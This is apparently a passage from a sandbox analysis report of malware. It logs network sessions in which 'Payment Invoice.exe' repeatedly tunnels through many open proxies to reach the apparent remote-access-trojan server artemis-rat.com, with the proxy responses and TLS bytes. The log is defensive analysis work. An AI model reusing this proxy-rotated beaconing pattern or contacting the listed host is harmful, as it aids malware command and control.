                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                152192.168.2.4503264.236.183.3780807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.789552927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.323597908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.002232075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.386481047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278819084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.090002060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.804011106 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.22.0
                                                                Date: Mon, 11 Mar 2024 15:15:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                153192.168.2.45026043.129.228.4678917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.803147078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                154192.168.2.45029913.40.239.13031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.804547071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.096050978 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                155192.168.2.45018643.133.136.20888007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.811481953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                156192.168.2.450468172.67.14.237807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.813272953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.967618942 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                157192.168.2.450470185.238.228.240807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.814173937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.968652964 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                158192.168.2.45036454.152.3.36807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.814568996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.031269073 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:15.031752110 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 01 3b 33 d5 7d 4d 71 f5 81 9f 83 a0 26 89 bd 09 b4 53 dd 1f c1 f9 1a ac 88 9a 07 9b 54 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e ;3}Mq&ST*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:15.248635054 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 2a 09 5f cb 1d 83 17 7f 75 ef 60 9f e3 67 5d 9a ca 55 42 e0 9c 39 19 47 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9*_u`g]UB9GDOWNGRD0000*H010Uartemis-rat.com0240311144647Z260311144647Z010Uartemis-rat.com0"0*H0S-m%]Q
                                                                Mar 11, 2024 16:15:15.269474030 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 8b 70 cf 04 67 54 f1 ae fd 05 12 e4 1f 7b dc 17 2f 54 2b 65 4c cc 8d c7 df 01 87 c9 87 2d 09 06 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5b 8e 9d 55 fc 49 8f 6b 7f c5 e4 e5 9f be c1 cf 72 14 42 85 c7
                                                                Data Ascii: %! pgT{/T+eL-([UIkrBDgwG~
                                                                Mar 11, 2024 16:15:15.485183954 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 0e 02 01 bb f3 53 31 82 02 7e a6 ba 8d d0 fe be 1f 2b 98 1d 1b b7 c7 24 98 32 64 56 2c 9c 26 12 23 f6 77 ba 1e ec 8a 13
                                                                Data Ascii: (S1~+$2dV,&#w


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                159192.168.2.4502883.25.234.17588887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.816102982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.126921892 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                160192.168.2.45029082.64.77.30807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.822412014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.454819918 CET555INHTTP/1.1 403 Proxy Error
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: Apache
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 313
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                161192.168.2.450422198.23.229.203156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.833584070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                162192.168.2.45037592.204.134.38425717076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.844590902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                163192.168.2.45041320.106.146.21260017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.849883080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                164192.168.2.450478172.67.209.12807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.854284048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.008488894 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                165192.168.2.450482104.20.103.68807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.855158091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.009473085 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                166192.168.2.45042945.196.151.8454327076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.890381098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.107928991 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                Server: FaaS v1.3-20220203-7fa38bd5af
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 65
                                                                Proxy-Authenticate: Basic realm="Proxy"
                                                                Connection: close
                                                                Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                167192.168.2.450289186.125.218.1459997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.890382051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.216994047 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                168192.168.2.450292128.199.252.4180007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.892944098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                169192.168.2.45029891.202.230.21980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.893104076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                170192.168.2.450272138.36.150.1610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.893214941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                171192.168.2.450450209.159.153.19245437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.893218040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.115590096 CET24INHTTP/1.1 403 #string


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                172192.168.2.450325162.19.7.56441957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.893443108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.206576109 CET24INHTTP/1.1 403 #string


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                173192.168.2.45040872.195.114.16941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.893443108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                174192.168.2.450113111.59.4.8890027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.893825054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.325334072 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                175192.168.2.450495104.16.105.142807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.895000935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.049638987 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
